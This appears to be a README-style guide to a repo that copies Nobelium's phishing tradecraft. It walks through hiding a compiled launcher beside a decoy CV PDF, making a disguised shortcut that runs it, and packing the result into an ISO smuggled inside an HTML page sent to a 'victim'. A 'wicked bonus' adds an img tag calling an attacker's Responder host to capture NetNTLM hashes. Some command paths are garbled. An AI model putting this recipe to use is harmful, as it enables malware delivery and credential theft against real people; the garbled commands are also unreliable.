It's been a while I wanted to try to mimick the cybercriminal group Nobelium's early-stage toolset and I thought it would be fun to do that sending a CV.
First of you can clone this repo :
git clone https://github.com/fredtep/SendCV.gitIn Linux :
Modify calc.cs to suite your needs then compile with :
mcs -out:calcLauncher.exe calc.csIn windows :
1/ Create a Directory
mkdir CV\Hidden
2/ Hide the Hidden Folder
attrib +h CV\Hidden
3/ Copy the Hidden/CV-Hack3r-2024.pdf inside the Hidden Folder
4/ Copy calcLauncher.exe inside the CV Folder
5/ Hide calcLauncher.exe (right click > properties > Hidden)
6/ Now create a shorcut :
-
right click > New > Shorcut
-
For the path choose : C:32.exe c:.dll,RegisterOCX calcLauncher.exe
-
For the name choose : CV
Bonus/ You can change the icon as well if you want : right click > properties > Change Icon
You can select some icon from here : %systemroot%.dll
Building the ISO file
First of all we need to get oscdimg.exe which is installed along with the Windows Assessment and Deployment Kit (Windows ADK) To do so download ADK at this address : https://learn.microsoft.com/en-us/windows-hardware/get-started/adk-install
Now you can run the following command
"C:\Program Files (x86)\Windows Kits\10\Assessment and Deployment Kit\Deployment Tools\x86\Oscdimg\Oscdimg" -m -u2 -h -lCV "C:\users\fred\Desktop\CV" "C:\Users\fred\Desktop\CV.iso"
Now just take your file back to linux and encode the ISO to base64.
cat CV.iso | base64 -w 0
Finally copy the output and replace the content of the b64iso variable inside cv.html (toward the end of the script)
Upload cv.html to a server or send it as is and enjoy !
WICKED BONUS
You can capture the NetNTLM hash of your victim by running responder in a server you own and change line 119 in cv.html : <img src="file://<MY EVIL IP RUNNING RESPONDER>/responder.png" alt="">
Filesaver.js can be found here
Nobelium breakdown can be found here